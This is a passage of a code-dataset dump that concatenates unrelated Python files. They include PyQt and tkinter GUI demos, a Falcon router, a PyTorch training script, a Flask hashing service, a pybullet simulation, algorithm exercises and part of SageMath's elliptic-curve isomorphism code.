self.horizontalLayout.addWidget(self.left_side_menu)\n self.center_main_items = QtWidgets.QFrame(self.main_body)\n self.center_main_items.setStyleSheet(\"\")\n self.center_main_items.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.center_main_items.setFrameShadow(QtWidgets.QFrame.Raised)\n self.center_main_items.setObjectName(\"center_main_items\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.center_main_items)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.stackedWidget = QtWidgets.QStackedWidget(self.center_main_items)\n self.stackedWidget.setStyleSheet(\"background-color: #FEFDFC;\")\n self.stackedWidget.setObjectName(\"stackedWidget\")\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"page\")\n self.stackedWidget.addWidget(self.page)\n self.page_2 = QtWidgets.QWidget()\n self.page_2.setObjectName(\"page_2\")\n self.stackedWidget.addWidget(self.page_2)\n self.verticalLayout_2.addWidget(self.stackedWidget)\n self.horizontalLayout.addWidget(self.center_main_items)\n self.verticalLayout.addWidget(self.main_body)\n self.main_footer = QtWidgets.QFrame(self.centralwidget)\n self.main_footer.setMaximumSize(QtCore.QSize(16777215, 30))\n self.main_footer.setStyleSheet(\"QFrame{\\n\"\n\" background-color: grey;\\n\"\n\"}\")\n self.main_footer.setFrameShape(QtWidgets.QFrame.WinPanel)\n self.main_footer.setFrameShadow(QtWidgets.QFrame.Raised)\n self.main_footer.setObjectName(\"main_footer\")\n self.verticalLayout.addWidget(self.main_footer)\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.retranslateUi(MainWindow)\n self.stackedWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n \n self.mainwindow=MainWindow\n self.initialiseMainWindow()\n self.left_menu_toggle_btn.clicked.connect(lambda:self.slideLeftMenu(\"1\"))\n self.SignOut.clicked.connect(self.signOut)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.SignOut.setText(_translate(\"MainWindow\", \"Sign Out\"))\n","repo_name":"ahmedhamila/GMAO","sub_path":"Source/Views/AllUsersViews/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":40931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35315157793","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QLabel,\n QPushButton, QSpinBox)\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import pyqtSlot\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n # GUI proprieties\n self.setGeometry(400, 100, 300, 200)\n self.setWindowTitle('My first app')\n\n # Labels\n # Label 1: Plain text\n label1 = QLabel('My first application says:', self)\n label1.setFixedWidth(120) # fixing the width of the label\n label1.move(10, 10)\n # Label 2: Rich text\n self.label2 = QLabel(\"\", self)\n self.label2.move(130, 10)\n message = \"

Hello Python!\"\n self.label2.setText(message)\n self.label2.setFixedWidth(120)\n # Label 3: Image\n self.label3 = QLabel(\"\", self)\n self.label3.setFixedSize(50, 50)\n self.label3.setPixmap(QPixmap(\"greating.svg\"))\n self.label3.show()\n self.label3.move(250, 10)\n\n # Buttons\n # Push Button 1: Hello Button\n button1 = QPushButton('Hello', self)\n button1.setToolTip('This is the Hello Button')\n button1.move(50, 50)\n button1.clicked.connect(self.on_click_button1)\n # Push Button 2: Goodbye Button\n button2 = QPushButton('Goodbye', self)\n button2.setToolTip('This is the Goodbye Button')\n button2.move(170, 50)\n button2.clicked.connect(self.on_click_button2)\n\n # Spin Box: Spin Box change integer value from 0 to 100\n self.spb = QSpinBox(self)\n self.spb.setMinimum(0)\n self.spb.setMaximum(100)\n self.spb.setValue(50)\n self.spb.setSingleStep(1)\n self.spb.setGeometry(80, 110, 50, 20) # set geometry (x,y,width,hight)\n self.spb.valueChanged.connect(self.spb_valuechange)\n self.spb.move(180, 160)\n # set a label saying what Spin Box refer to\n txt = QLabel('The value is: ', self)\n txt.setGeometry(10, 110, 75, 20) # set geometry (x,y,width,hight)\n # set a label to a receive a value from the spin box\n self.val = QLabel(\"\", self)\n # set geometry (x,y,width,height)\n self.val.setGeometry(150, 110, 75, 20)\n\n @pyqtSlot() # Push Button 1 signal\n def on_click_button1(self):\n message = \"

Hello Python!\"\n self.label2.setText(message)\n self.label2.setFixedWidth(120)\n self.label3.setPixmap(QPixmap(\"greating.svg\"))\n self.label3.show()\n\n @pyqtSlot() # Push Button 2 signal\n def on_click_button2(self):\n message = \"

Goodbye Python!\"\n self.label2.setText(message)\n self.label2.setFixedWidth(120)\n self.label3.setPixmap(QPixmap(\"greating.svg\"))\n self.label3.show()\n\n @pyqtSlot(int) # Spin Box signal\n def spb_valuechange(self, value):\n '''\n the value of the spin box is an integer, \n convert it to a string using the str() function.\n '''\n self.val.setText(str(self.spb.value()))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n MyApplication = MainWindow()\n MyApplication.show()\n sys.exit(app.exec_())\n","repo_name":"xu-nuo-xu/Understanding_Optics_with_Python","sub_path":"programs/chapter2/SpinBox.py","file_name":"SpinBox.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"74716826085","text":"# -*- coding:utf-8 -*-\nimport os\nimport sys\nimport copy\nimport falcon\nimport route.docs_route as r_docs\nfrom config import *\nfrom api.middleware import AuthMiddleware\nimport function.basic as fb\n\nROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(ROOT_PATH)\n\n\nclass Wsgi(object):\n app = falcon.API(middleware=[AuthMiddleware()])\n root_path = os.getcwd()\n root_child_path = '/api'\n root_api_path = os.getcwd() + root_child_path\n api_files = []\n\n def __init__(self):\n self.api_files = fb.get_files(self.root_api_path, '_api.py')\n\n def process(self):\n \"\"\"api文件夹下的api初始化\"\"\"\n if self.api_files:\n config = load_config_auto()\n profix = config.DOMAIN_PROFIX\n for f in self.api_files:\n f = f.split('.')[0]\n m_path = \"api.\"+f\n\n m = __import__(m_path, {}, {}, ['not None'])\n f = f.split('_')\n f_c = len(f)\n f_name = ''\n if f_c > 1:\n for i in range(0, f_c, 1):\n f_name += f[i].capitalize()\n else:\n f_name = f_c[0].capitalize()\n\n obj = getattr(m, f_name)()\n self.app.add_route(profix + obj.api_path, obj)\n\n def my_serializer(req, exception):\n \"\"\"修改error的默认content-type类型\"\"\"\n exception = exception.to_json()\n return \"application/json\", exception\n self.app.set_error_serializer(my_serializer)\n \"\"\"\n 添加others路径\n \"\"\"\n for i in [r_docs.Docs(), r_docs.DocsHtml(), r_docs.DocsResource(),\n r_docs.DocsJs(), r_docs.DocsCss(), r_docs.DocsFont()]:\n self.app.add_route(profix + i.path, i)\n\n def get_app(self):\n self.process()\n return self.app\n\no = Wsgi()\napp = o.get_app()","repo_name":"dingdan539/healer","sub_path":"src/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70262165604","text":"import tkinter\nimport numpy as np\nfrom tkinter import *\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\n\n\n\nroot = tkinter.Tk()\nroot.geometry(\"400x680\")\nroot.wm_title(\"PY-83\")\n\n#setting up graphing grid on canvas:\nfig = Figure(figsize=(5, 3), dpi=100)\na = fig.add_subplot(111)\ncanvas = FigureCanvasTkAgg(fig, master=root)\ncanvas.get_tk_widget().pack(side=tkinter.TOP)\n\n#setting up interval for plotting:\nx=np.linspace(-5,5,100)\n\n#plotting function:\ndef plot():\n y = eval(e.get())\n lines = a.plot(x,y,'r')\n canvas.draw()\n\n#setting up toolbar:\ntoolbar = NavigationToolbar2Tk(canvas, root)\ntoolbar.update()\ncanvas.get_tk_widget().pack(side=tkinter.TOP)\n\n\n\n#adding number to the screen:\ndef button_click(number):\n current = e.get()\n e.delete(0,END)\n e.insert(0, str(current)+str(number))\n return\n\n#four basic operations\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = \"addition\"\n f_num = float(first_number)\n e.delete(0, END)\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = \"subtraction\"\n f_num = float(first_number)\n e.delete(0, END)\n \ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = \"multiplication\"\n f_num = float(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = \"division\"\n f_num = float(first_number)\n e.delete(0, END)\n\n#equal sign\ndef button_equal():\n second_number = e.get()\n e.delete(0,END)\n\n if math == \"addition\":\n e.insert(0, f_num + float(second_number))\n\n if math == \"subtraction\":\n e.insert(0, f_num - float(second_number))\n\n if math == \"multiplication\":\n e.insert(0, f_num * float(second_number))\n\n if math == \"division\":\n e.insert(0, f_num / float(second_number))\n\n#clear entry and screen\ndef button_clear():\n e.delete(0,END)\n a.lines=[]\n canvas.draw()\n\n#placing buttons on screen: \nbutton_1 = Button(root, text=\"1\",padx=40,pady=20, command=lambda:button_click(1))\nbutton_2 = Button(root, text=\"2\",padx=40,pady=20, command=lambda:button_click(2))\nbutton_3 = Button(root, text=\"3\",padx=40,pady=20, command=lambda:button_click(3))\n\nbutton_4 = Button(root, text=\"4\",padx=40,pady=20, command=lambda:button_click(4))\nbutton_5 = Button(root, text=\"5\",padx=40,pady=20, command=lambda:button_click(5))\nbutton_6 = Button(root, text=\"6\",padx=40,pady=20, command=lambda:button_click(6))\n\nbutton_7 = Button(root, text=\"7\",padx=40,pady=20, command=lambda:button_click(7))\nbutton_8 = Button(root, text=\"8\",padx=40,pady=20, command=lambda:button_click(8))\nbutton_9 = Button(root, text=\"9\",padx=40,pady=20, command=lambda:button_click(9))\n\nbutton_0 = Button(root, text=\"0\",padx=40,pady=20, command=lambda:button_click(0))\nbutton_equal = Button(root, text=\"=\",padx=40,pady=20, command=button_equal, bg=\"#EA3C53\")\nbutton_divide = Button(root, text=\"÷\",padx=40,pady=20, command=button_divide, bg=\"#89CFF0\")\n\nbutton_add = Button(root, text=\"+\",padx=40,pady=20, command=button_add, bg=\"#89CFF0\")\nbutton_minus = Button(root, text=\"-\",padx=40,pady=20, command=button_subtract, bg=\"#89CFF0\")\nbutton_mult = Button(root, text=\"×\",padx=40,pady=20, command=button_multiply, bg=\"#89CFF0\")\nbutton_dot = Button(root, text=\".\",padx=40,pady=20, command=lambda:button_click(\".\"))\n\nbutton_clear = Button(root, text=\"Clear\",padx=53,pady=4, command=button_clear)\n\nbutton_plot = Button(root, text=\"Plot\",padx=30,pady=4, command=plot, bg=\"#A0D6B4\")\n\n\n\nbutton_plot.place(x=300,y=310)\n\nbutton_7.place(x=0,y=350)\nbutton_8.place(x=100,y=350)\nbutton_9.place(x=200,y=350)\n\nbutton_4.place(x=0,y=420)\nbutton_5.place(x=100,y=420)\nbutton_6.place(x=200,y=420)\n\nbutton_1.place(x=0,y=490)\nbutton_2.place(x=100,y=490)\nbutton_3.place(x=200,y=490)\n\nbutton_0.place(x=0,y=560)\nbutton_dot.place(x=100,y=560)\nbutton_equal.place(x=200,y=560)\n\nbutton_add.place(x=300,y=350)\nbutton_minus.place(x=300,y=420)\nbutton_mult.place(x=300,y=490)\nbutton_divide.place(x=300,y=560)\n\nbutton_clear.place(x=250,y=640)\n\n#placing entry on the screen:\ne = Entry(root, width = 45, borderwidth=5)\ne.place(x=10,y=310)\n#functions inputed on the entry are plotted on the screen, try something like x**2\n#other functions need to be typed with reference to np as np.sin(x) or np.exp(x), for example\n\n\ntkinter.mainloop()\n","repo_name":"thatguysilva/PY-83","sub_path":"py83-source.py","file_name":"py83-source.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7939904822","text":"from shared_config import ex\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import EarlyStopping\nimport models\nfrom utils.existed_checkpoint import ExistedModelCheckpoint\nimport datasets\nfrom pytorch_lightning import loggers as pl_loggers\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport os\nfrom utils import load_from_config,config_name\nimport torch\nfrom utils import samplers\nimport numpy as np\nfrom torch.utils.data import SequentialSampler,RandomSampler\nfrom torch import nn\nimport torch\nimport re\n\ndef assign_parameter(model,name,param):\n names = name.split('.')\n for i in names[:-1]:\n model = model.__getattr__(i)\n model.__setattr__(names[-1],param)\n \nclass SharedModel(nn.Module):\n def __init__(self,model1,model2,shared_param_mask,**kwargs):\n super().__init__(**kwargs)\n share_params = []\n for n,p in model1.named_parameters():\n if re.match(shared_param_mask,n):\n share_params.append(n)\n assign_parameter(model2,n,p)\n self.model1 = model1\n self.model2 = model2\n \n def forward(self,x):\n if self.training:\n size = x.shape[0]//2\n x1,x2 = tuple(torch.split(x,[size,size]))\n return torch.cat([self.model1(x1),self.model2(x2)])\n else:\n return self.model2(x)\n\n\nclass MultyDatasetBatchSampler:\n def __init__(self,dataset,batch_size,shuffle=True,sampler=None,label_names=None):\n assert batch_size% len(dataset.datasets)==0,'wrong!'\n self.offsets = np.array(dataset.offsets)\n lo,hi = dataset.offsets,dataset.offsets[1:]+[None]\n if sampler is None:\n if shuffle:\n self.samplers = [RandomSampler(i) for i in dataset.datasets]\n else:\n self.samplers = [SequentialSampler(i) for i in dataset.datasets]\n else:\n self.samplers = [load_from_config(sampler, samplers)(labels=dataset.labels[l:h],\n label_names=dataset.label_names) for l,h in zip(lo,hi)]\n self.batch_size = batch_size\n \n def __iter__(self):\n batch = []\n for idx in zip(*self.samplers):\n batch.append(idx)\n if len(batch) == self.batch_size//len(self.samplers):\n batch = (np.array(batch)+self.offsets[None,:]).transpose().flatten()\n yield list(batch)\n batch = []\n\n def __len__(self) -> int:\n return min([len(i) for i in self.samplers])//(self.batch_size//len(self.samplers))\n \n@ex.capture\ndef load_dataset(dataset, mode, sampler=None,batch_size=64,input_size=(224,224),num_workers=8,reduce_size=None,label_names=None):\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n input_size = tuple(input_size)\n if mode == 'train':\n transform = transforms.Compose([\n transforms.RandomResizedCrop(input_size, (0.8, 1.2)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n else:\n transform = transforms.Compose([\n transforms.Resize(input_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n if not isinstance(dataset,list):\n dataset = [dataset]\n dataset = [load_from_config(i,datasets)(mode=mode,transform=transform,reduce_size=reduce_size) for i in dataset]\n dsizes = [len(i) for i in dataset]\n dataset = datasets.JoinDatasets(dataset,use_names=label_names)\n batch_sampler = MultyDatasetBatchSampler(dataset,batch_size,shuffle=(mode=='train'),sampler=sampler,label_names=label_names)\n loader = DataLoader(dataset,batch_sampler=batch_sampler, num_workers=num_workers)\n return loader,dataset\n\n\n\n\n\n\n@ex.capture\ndef load_train_val_test(dataset=None,train_dataset=None,val_dataset=None,test_dataset=None,sampler=None,label_names=None):\n \n train = load_dataset(train_dataset or dataset,mode='train',sampler=sampler,label_names=label_names)\n if label_names is None:\n label_names = train[1].label_names\n val = load_dataset(val_dataset or dataset,mode='val',label_names=label_names,sampler=None)\n test_dataset = test_dataset or dataset\n if not isinstance(test_dataset,list):\n test_dataset = [test_dataset]\n test = [load_dataset(i,mode='test',label_names=label_names,sampler=None) for i in test_dataset]\n\n number_of_samples = np.concatenate([(i[1].labels==1).sum(0)[:,None] for i in [train,val,*test]],1)\n print('\\n'.join(['{:15s} | '.format(n)+' | '.join(['{:6d}'.format(i) for i in c]) for n,c in zip(label_names,number_of_samples)]))\n return label_names, train[0],val[0],[i[0] for i in test]\n\n\ndef load_backdone(label_names,backbone,shared_param_mask,pretrained_backbone):\n backbone = load_from_config(backbone,models)()\n if not (pretrained_backbone is None):\n backbone.load_state_dict(torch.load(pretrained_backbone)['state_dict'],strict=True)\n \n if hasattr(backbone,'classifier'):\n backbone.classifier = nn.Sequential(nn.Linear(backbone.classifier.in_features, len(label_names)), nn.Sigmoid())\n else:\n backbone.fc= nn.Sequential(nn.Linear(self.backbone.fc.in_features, len(label_names)), nn.Sigmoid())\n return backbone\n \n@ex.capture\ndef load_model(label_names,optimizer,scheduler,backbone,shared_param_mask,unfreeze_epoch=0,pretrained_backbone=None):\n backbone1 = load_backdone(label_names,backbone,shared_param_mask,pretrained_backbone)\n backbone2 = load_backdone(label_names,backbone,shared_param_mask,pretrained_backbone) \n backbone = SharedModel(backbone1,backbone2,shared_param_mask)\n \n optimizer = load_from_config(optimizer,torch.optim)\n lr_scheduler = load_from_config(scheduler,torch.optim.lr_scheduler)\n model = models.BasicClassifierModel(backbone, label_names, optimizer, lr_scheduler,unfreeze_epoch=unfreeze_epoch)\n return model\n\n@ex.capture\ndef load_trainer(exp_root,exp_name,version,_config,load_epoch=None):\n tb_logger = pl_loggers.TensorBoardLogger(exp_root,exp_name,version)\n checkpointer = ExistedModelCheckpoint(monitor='val_loss',\n mode='min',\n save_top_k=5,\n dirpath = os.path.join(exp_root,exp_name,version,'checkpoints'),\n filename=config_name(_config['backbone'])+'-{epoch}-{val_loss:.3f}-{train_loss:.3f}')\n\n callbacks = [checkpointer,EarlyStopping(monitor='val_loss',patience=10)]\n trainer = pl.Trainer(logger=tb_logger,\n resume_from_checkpoint=checkpointer.get_checkpoint_path(load_epoch),\n callbacks=callbacks,**_config.get('trainer',{}))\n return trainer,checkpointer\n\n@ex.capture\ndef write_results(path,results,exp_root,exp_name,version):\n open(os.path.join(exp_root,exp_name,version,'%s.csv'%(path.split('/')[-1])),'a').write('\\n'.join(['%s,%s'%(k,str(v)) for k,v in results[0].items()])+'\\n')\n\n@ex.command\ndef test(load_epoch):\n label_names, _, _, test_loaders = load_train_val_test()\n model = load_model(label_names)\n trainer,checkpointer = load_trainer()\n for test_loader in test_loaders:\n results = trainer.test(model=model,test_dataloaders=test_loader)\n write_results(checkpointer.get_checkpoint_path(load_epoch),results)\n\n\n@ex.automain\ndef main(load_epoch):\n label_names,train_loader, val_loader, test_loaders = load_train_val_test()\n model=load_model(label_names)\n trainer,checkpointer = load_trainer()\n try:\n trainer.fit(model, train_loader, val_loader)\n finally:\n if not checkpointer.get_checkpoint_path(load_epoch) is None:\n for test_loader in test_loaders:\n results = trainer.test(model=model, test_dataloaders=test_loader)\n write_results(checkpointer.get_checkpoint_path(load_epoch), results)","repo_name":"nvvaulin/medical_imaging","sub_path":"shared_train.py","file_name":"shared_train.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18168514064","text":"# service1.py\nfrom flask import Flask, request\nimport hashlib\n\napp = Flask(__name__)\n\n@app.route('/calculate_hash', methods=['POST'])\ndef calculate_hash():\n data = request.get_json()\n if 'text' not in data:\n return \"Error: 'text' parameter not provided.\", 400\n\n text = data['text']\n hash_value = hashlib.sha256(text.encode()).hexdigest()\n return {'hash': hash_value}\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"DSever776/avl_task","sub_path":"service1/service1.py","file_name":"service1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1023608161","text":"import asyncio\nimport time\n\nfrom more_itertools import chunked\n\nfrom db import engine, Session, People, Base\n\nimport aiohttp\n\nURL = 'https://swapi.dev/api'\n\nCHUNK_SIZE = 10\n\n\nasync def get_person(person_id: int) -> dict:\n session = aiohttp.ClientSession()\n response = await session.get(f'{URL}/people/{person_id}')\n response_json = await response.json()\n await session.close()\n return response_json\n\n\nasync def get_people(start, end):\n for id_chunk in chunked(range(start, end), CHUNK_SIZE):\n coroutines = [get_person(i) for i in id_chunk]\n result = await asyncio.gather(*coroutines)\n for person in result:\n yield person\n\n\nasync def main():\n async for person in get_people(1, 17):\n print(person['name'])\n print(person['mass'])\n\nstart = time.time()\nasyncio.run(main())\nprint('Время работы ', time.time() - start)\n","repo_name":"Alexnor11/web_asyncio","sub_path":"get_sw_async.py","file_name":"get_sw_async.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8704550768","text":"import pybullet as p\nimport pyrosim.pyrosim as pyrosim\nimport pybullet_data\nimport time\nimport numpy as np\nimport random\nimport constants as c\nfrom world import WORLD\nfrom robot import ROBOT\n\nclass SIMULATION:\n \n def __init__(self, directOrGui, solutionID):\n \n if directOrGui == \"DIRECT\":\n physicsClient = p.connect(p.DIRECT)\n else:\n physicsClient = p.connect(p.GUI)\n p.setAdditionalSearchPath(pybullet_data.getDataPath())\n p.setGravity(0,0,-9.8)\n self.world = WORLD()\n self.robot = ROBOT(solutionID)\n \n pyrosim.Prepare_To_Simulate(self.robot.robotId)\n self.robot.Prepare_To_Sense()\n self.robot.Prepare_to_Act()\n \n\n \n \n \n def Run(self):\n for i in range(c.iterations):\n p.stepSimulation()\n time.sleep(1/24000)\n self.robot.Sense(i)\n self.robot.Think(i)\n self.robot.Act(i)\n\n \n def Get_Fitness(self):\n self.robot.Get_Fitness()\n \n def __del__(self):\n p.disconnect()","repo_name":"pacochow/Evolving-bots","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15054570151","text":"'''from functools import reduce\nli = [1,2,3,4,5]\nprint(reduce(lambda x,y:x*y, li))\n'''\n # 120 = ((((1*2)*3)*4)*5)\n\n\nstack = [1]\nadd_tmp = 0\nresult = 0\ntmp = 0\ncc = 0\ncheck = True\nli = [0 for i in range(100001)]\nfor _ in range(int(input())):\n comnd = input().split(' ')\n if comnd[0] == 'for':\n num = comnd[1]\n stack.append(num)\n cc += 1\n elif comnd[0] == 'add':\n if cc == 0:\n li[cc] += 1\n else:\n stack.append('add')\n elif comnd[0] == 'end':\n a = stack.pop()\n while a.isalpha():\n #add_tmp += 1\n li[cc] += 1\n a = stack.pop()\n cc -= 1\n a = int(a)\n li[cc] = li[cc] + li[cc+1]*a\n li[cc+1] = 0\n if li[cc] >= 2**32:\n check = False\n break\n #add_tmp = a*add_tmp\n '''if cc == 0:\n result += add_tmp\n add_tmp = 0'''\n\nif li[0] >= 2**32 or check == False :\n #print(result)\n print(\"OVERFLOW!!!\")\nelse:\n #print(result)\n print(li[0])\n\n\n\n'''8\nfor 2\nfor 3\nadd\nend\nfor 4\nadd\nend\nend'''\n","repo_name":"HoeYeon/Algorithm","sub_path":"Python_Algorithm/codeforce/1175B(리스트 사칙연산 모두 적용).py","file_name":"1175B(리스트 사칙연산 모두 적용).py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39814586291","text":"'''\n102. Binary Tree Level Order Traversal\nLink: https://leetcode.com/problems/binary-tree-level-order-traversal/\n\nGiven a binary tree, return the level order traversal of\nits nodes' values. (ie, from left to right, level by level).\n\nConduct a breadth-first search for level order traversal\n\nGiven binary tree [3, 9, 20, null, null, 15, 7],\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its level order traversal as:\n\n[\n [3],\n [9, 20],\n [15, 7]\n]\n'''\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef levelOrder(root: TreeNode):\n '''\n Time complexity: O(N) since each node is processed exactly once.\n Space complexity: O(N) to keep the output structure that contains N node values.\n '''\n\n if not root:\n return []\n\n queue, res = [root], []\n\n while queue:\n level_size = len(queue)\n level = []\n\n for _ in range(0, level_size):\n node = queue.pop(0)\n level.append(node.val)\n\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n\n res.append(level)\n\n return res\n","repo_name":"ErickMwazonga/sifu","sub_path":"trees/bfs/bfs_traversal_level.py","file_name":"bfs_traversal_level.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"17512864399","text":"r\"\"\"\nIsomorphisms between Weierstrass models of elliptic curves\n\nAUTHORS:\n\n- Robert Bradshaw (2007): initial version\n- John Cremona (Jan 2008): isomorphisms, automorphisms and twists\n in all characteristics\n- Lorenz Panny (2021): :class:`EllipticCurveHom` interface\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2007 Robert Bradshaw \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n#\n# This code is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# The full text of the GPL is available at:\n#\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\nfrom sage.structure.element import get_coercion_model\n\nfrom .constructor import EllipticCurve\nfrom sage.schemes.elliptic_curves.hom import EllipticCurveHom\nfrom sage.structure.richcmp import (richcmp_method, richcmp, richcmp_not_equal,\n op_NE)\nfrom sage.structure.sequence import Sequence\nfrom sage.rings.all import Integer, PolynomialRing\n\n\n@richcmp_method\nclass baseWI(object):\n r\"\"\"\n This class implements the basic arithmetic of isomorphisms between\n Weierstrass models of elliptic curves.\n\n These are specified by lists of the form `[u,r,s,t]` (with\n `u\\not=0`) which specifies a transformation `(x,y) \\mapsto (x',y')`\n where\n\n `(x,y) = (u^2x'+r , u^3y' + su^2x' + t).`\n\n INPUT:\n\n - ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an\n isomorphism between Weierstrass models.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI()\n (1, 0, 0, 0)\n sage: baseWI(2,3,4,5)\n (2, 3, 4, 5)\n sage: R. = QQ[]\n sage: baseWI(u,r,s,t)\n (u, r, s, t)\n \"\"\"\n def __init__(self, u=1, r=0, s=0, t=0):\n r\"\"\"\n Constructor: check for valid parameters (defaults to identity)\n\n INPUT:\n\n - ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an\n isomorphism between Weierstrass models.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI()\n (1, 0, 0, 0)\n sage: baseWI(2,3,4,5)\n (2, 3, 4, 5)\n sage: R. = QQ[]\n sage: baseWI(u,r,s,t)\n (u, r, s, t)\n \"\"\"\n if u == 0:\n raise ValueError(\"u!=0 required for baseWI\")\n self.u = u\n self.r = r\n self.s = s\n self.t = t\n\n def __richcmp__(self, other, op):\n \"\"\"\n Standard comparison function.\n\n The ordering is just lexicographic on the tuple `(u,r,s,t)`.\n\n .. NOTE::\n\n In a list of automorphisms, there is no guarantee that the\n identity will be first!\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import baseWI\n sage: baseWI(1,2,3,4) == baseWI(1,2,3,4)\n True\n sage: baseWI(1,2,3,4) != baseWI(1,2,3,4)\n False\n sage: baseWI(1,2,3,4) < baseWI(1,2,3,5)\n True\n sage: baseWI(1,2,3,4) > baseWI(1,2,3,4)\n False\n\n It will never return equality if ``other`` is of another type::\n\n sage: baseWI() == 1\n False\n \"\"\"\n if not isinstance(other, baseWI):\n return (op == op_NE)\n return richcmp(self.tuple(), other.tuple(), op)\n\n def tuple(self):\n r\"\"\"\n Return the parameters `u,r,s,t` as a tuple.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: w = baseWI(2,3,4,5)\n sage: w.tuple()\n (2, 3, 4, 5)\n \"\"\"\n return (self.u, self.r, self.s, self.t)\n\n def __mul__(self, other):\n r\"\"\"\n Return the composition of this isomorphism and another.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI(1,2,3,4)*baseWI(5,6,7,8)\n (5, 56, 22, 858)\n sage: baseWI()*baseWI(1,2,3,4)*baseWI()\n (1, 2, 3, 4)\n \"\"\"\n u1, r1, s1, t1 = other.tuple()\n u2, r2, s2, t2 = self.tuple()\n return baseWI(u1 * u2,\n (u1**2) * r2 + r1,\n u1 * s2 + s1,\n (u1**3) * t2 + s1 * (u1**2) * r2 + t1)\n\n def __invert__(self):\n r\"\"\"\n Return the inverse of this isomorphism.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: w = baseWI(2,3,4,5)\n sage: ~w\n (1/2, -3/4, -2, 7/8)\n sage: w*~w\n (1, 0, 0, 0)\n sage: ~w*w\n (1, 0, 0, 0)\n sage: R. = QQ[]\n sage: w = baseWI(u,r,s,t)\n sage: ~w\n (1/u, (-r)/u^2, (-s)/u, (r*s - t)/u^3)\n sage: ~w*w\n (1, 0, 0, 0)\n \"\"\"\n u, r, s, t = self.tuple()\n return baseWI(1/u, -r/(u**2), -s/u, (r*s-t)/(u**3))\n\n def __repr__(self):\n r\"\"\"\n Return the string representation of this isomorphism.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI(2,3,4,5)\n (2, 3, 4, 5)\n \"\"\"\n return repr(self.tuple())\n\n def is_identity(self):\n r\"\"\"\n Return ``True`` if this is the identity 